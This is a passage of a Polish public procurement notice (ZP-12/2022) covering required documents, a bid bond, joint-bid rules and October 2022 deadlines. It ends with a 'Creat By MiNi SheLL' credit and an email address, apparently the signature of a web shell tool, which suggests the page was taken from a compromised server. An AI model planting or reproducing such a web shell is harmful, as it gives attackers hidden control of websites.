wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy o braku <br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego <br/>2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2020 r. poz. 1076 i 1086), z <br/>innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o <br/>dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej <br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi <br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w <br/>postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy <br/>kapitałowej (załącznik nr 3 do SWZ ZP-12/2022);<br/>e. informacji z Krajowego Rejestru Karnego w zakresie:<br/>20.2. art. 108 ust. 1 pkt 1 i 2 ustawy z dnia 11 września 2019 r. - Prawo zamówień <br/>publicznych, zwanej dalej „ustawą”, 20.3. art. 108 ust. 1 pkt 4 ustawy, dotyczącej orzeczenia zakazu ubiegania się o <br/>zamówienie publiczne tytułem środka karnego,<br/>f. odpis lub informacje z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i <br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP, <br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy <br/>wymagają wpisu do rejestru lub ewidencji.<br/>g. oświadczenie o aktualności informacji w oświadczeniu, o którym mowa w art. 125 <br/>ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez <br/>zamawiającego, o których mowa w: a) art. 108 ust. 1 pkt 3 ustawy, b) art. 108 ust. 1 <br/>pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne <br/>tytułem środka zapobiegawczego, c) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia <br/>z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, d) art. 108 ust. 1 pkt 6 ustawy. (załącznik nr 7 do SWZ ZP-12/2022)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a. aktualne na dzień składania ofert oświadczenie Wykonawcy stanowiące wstępne <br/>potwierdzenie spełnienia warunków udziału w postępowaniu określonych w SWZ i <br/>braku podstaw do wykluczenia. (załącznik nr 2 do SWZ ZP-12/2022);<br/>c. wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a <br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich <br/>rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te <br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane <br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź <br/>inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane <br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w <br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (załącznik nr 5 do <br/>SWZ ZP-12/2022);<br/>d. wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w <br/>szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich <br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do <br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie <br/>czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 6<br/>do SWZ ZP-12/2022)</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 25.1. Zamawiający wymaga wniesienia wadium w wysokości: 3000,00 zł,<br/>25.2. Wadium należy wnieść przed upływem terminu składania ofert.<br/>25.3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>− pieniądzu,<br/>− gwarancjach bankowych,<br/>− gwarancjach ubezpieczeniowych,<br/>− poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy <br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2019 r. poz. 310,836,1572 z późn. zm.).<br/>25.4. Wadium wpłacane w pieniądzu należy wnieść przelewem na rachunek bankowy Zamawiającego w Banku Gospodarstwa Krajowego Oddział w Krakowie nr rachunku: 46 1130 1150 0012 1252 7890 0001 z dopiskiem: „wadium na zabezpieczenie oferty w postępowaniu ZP-12/2022.”<br/>25.5. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego. Dowód wniesienia wadium w formie innej niż pieniężnej należy załączyć do oferty. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> e) Pełnomocnictwo/Pełnomocnictwa dla osoby/osób podpisujących ofertę, jeżeli oferta jest podpisana przez pełnomocnika – jeżeli dotyczy W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy.<br/>17.7. Przed podpisaniem umowy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w przypadku wyboru ich oferty jako najkorzystniejszej) przedstawią Zamawiającemu umowę regulującą współpracę tych Wykonawców.<br/>19.3. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o zamówienie. Przy ocenie spełniania warunków przez Wykonawców wspólnie składających ofertę Zamawiający przyjmie, że warunki udziału określone w pkt 19.1. powinni spełniać łącznie wszyscy Wykonawcy. Żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania.<br/>19.4. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takim przypadku, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>20.2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o którym mowa w pkt 20.1.1) powyżej składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakresy zmian umowy reguluje §14 Zmiany umowy załącznika nr 4 - wzoru umowy w sprawie zamówienia publicznego SWZ ZP-12/2022<br/>1. Wprowadzenie zmian treści umowy wymaga sporządzenia pod rygorem nieważności <br/>formy pisemnej aneksu, z zastrzeżeniem art. 455 ust. 1 i 2 ustawy Prawo zamówień publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl - strona postępowania podana w swz.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-11 10:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-09</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com